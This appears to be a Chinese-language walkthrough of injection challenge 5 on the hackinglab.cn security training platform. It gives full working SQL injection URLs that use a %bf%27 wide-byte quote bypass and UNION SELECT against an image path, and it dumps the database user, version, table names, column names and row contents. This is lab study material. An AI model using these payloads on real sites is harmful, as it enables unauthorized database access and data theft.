1. 程式人生 > >網路資訊保安學習平臺--注入關第5題

網路資訊保安學習平臺--注入關第5題

網路資訊保安學習平臺網址:http://hackinglab.cn/

1、在網頁註釋的提示中,id=1,原以為注入點是id,結果經過多次測試,無法注入。網上搜索,得到提示是圖片注入。 2、從圖片入手,輸入如下內容,產生錯誤提示如下圖

說明確定存在注入點 注:使用的是Firefox上的httpRequest外掛。使用burp suit未出現以上提示。 3、輸入以下內容,爆庫名 http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%bf%27%20union SELECT 1,2,concat(user(),0x20,database(),0x20,version()),4 limit 0,2%23
4、爆表名 http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%bf%27%20union SELECT 1,2,TABLE_NAME,4 FROM information_schema.TABLES%20where%20table_SCHEMA=0x723034363663706c7573687561 limit 1,1%23 5、爆列 http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%bf%27%20union SELECT 1,2,COLUMN_NAME,4 FROM information_schema.COLUMNS%20where%20table_NAME=0x706963 limit 1,1%23
6、爆欄位內容 http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%bf%27%20union SELECT 1,2,picname,4 FROM pic limit 2,5%23 這裡要注意,如果limit寫成1,1那麼只顯示cat1.jpg內容 把limit設定成0,5你就明白什麼意思了

7、訪問圖片地址,看看結果吧